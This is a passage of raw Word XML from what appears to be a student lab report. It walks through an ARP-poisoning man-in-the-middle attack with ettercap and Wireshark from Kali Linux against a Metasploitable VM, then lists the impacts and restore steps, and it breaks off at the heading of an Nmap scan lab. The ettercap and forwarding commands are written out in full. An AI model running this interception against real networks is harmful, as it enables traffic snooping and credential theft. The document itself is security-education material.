          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidSect="0061574E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="16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EE3856" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="6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lastRenderedPageBreak/>
        <w:t>Look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for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F424E3" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1288"/>
        </w:tabs>
        <w:spacing w:before="205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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Gateway_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32381D04" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="204"/>
        <w:ind w:left="50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Note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Gateway IP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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBDE25E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68A207AA" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="129"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0CE498" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Enable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Forwarding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on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Kali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(Critical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Step)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AA5AE9" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="204" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="1168" w:right="2646" w:hanging="72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This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allows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Kali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to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forward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packets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between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victim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gateway. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b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sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>net.ipv4.ip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6E5F42" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="exact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Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67492CCF" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="204" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5360" w:firstLine="71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cat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/proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D48E620" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="exact"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B14D29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5CEA21B1" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="130"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1B70A0" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="505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Launch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ARP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Poisoning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 Using Ettercap (Text Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC5E20" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="exact"/>
        <w:ind w:left="116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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3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ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-T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-q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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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eth0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-M</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>arp:remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1573CDB7" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="43" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7007" w:firstLine="719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/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Gateway_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;/ Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A7A206" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="116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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3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ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-T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-q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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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eth0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-M</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>arp:remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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/192.168.56.102/</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /192.168.56.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF9107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626B9301" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F388EB" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="647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Verify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ARP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Poisoning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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2, run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D88D5E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7007" w:firstLine="719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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-n </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB41B80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Gateway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3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mapped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Kali’s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MAC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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FDADC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This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confirms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ARP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cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCC1034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72964C1E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF301B4" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="1" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5885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Intercept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Traffic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Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279511F6" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="80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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CDECD5B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidSect="0061574E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78DE5F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60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Select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interface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eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F7B2D5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5" w:line="417" w:lineRule="auto"/>
        <w:ind w:right="7560"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Apply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filter: </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E948ACB" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="exact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If</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3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accesses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any</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D5980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1"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Traffic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flows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through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Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F4F7B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5"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unencrypted data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can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be </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>captured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18DC34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2DC48B69" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682510C9" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="1" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="505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Analyze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Impact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of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 Observed Effects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101E075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Attacker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positions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itself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Man-in-the-</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CE8D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Victim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redirected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through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attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4DF93E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ARP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tables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manipulated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F97B6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1" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="4036" w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Confidential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data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may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be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exposed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if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unencrypted Security Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4C194D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0" w:line="276" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Loss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data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confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3473864D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5"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Possibility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credential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theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF3FDF5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Session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hijacking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risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01626C83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trust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model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compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E97C29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134D0EEF" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="129"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E42A432" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="1" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="4322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8: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Stop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Restore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Network </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Press:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1BC93" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="exact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CTRL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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC25E6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Disable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forwarding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6C1DF" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="204"/>
        <w:ind w:left="1168"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2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sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-w</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>net.ipv4.ip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_forward=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D84F45" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="508"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Restart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victim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reboot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machines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clear</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-16"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ARP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cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65D9F1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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A66BE28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ARP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poisoning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attack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successfully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performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4299C292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redirected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through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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA442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impact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communication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security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observed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analyzed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA5D307" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidSect="0061574E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9D903B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="6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lastRenderedPageBreak/>
        <w:t>Observations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B2F55C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line="276" w:lineRule="auto"/>
        <w:ind w:right="610"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Linux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commands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successfully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displayed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interface,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connectivity,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routing </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7BA0A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0"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ARP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table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entries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were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altered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due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to </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF7639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40"/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between</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="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2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gateway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routed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through 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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF721B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43"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Packets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were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intercepted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analyzed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Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D5BF2E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40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Temporary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disruption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observed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during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attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB6C1F1" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="18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3B2373" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="2" w:right="0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NO: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r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CBD802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0B2A876B" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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Port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Scanning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Nmap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(ACK, SYN,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FIN,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NULL,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XMAS </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
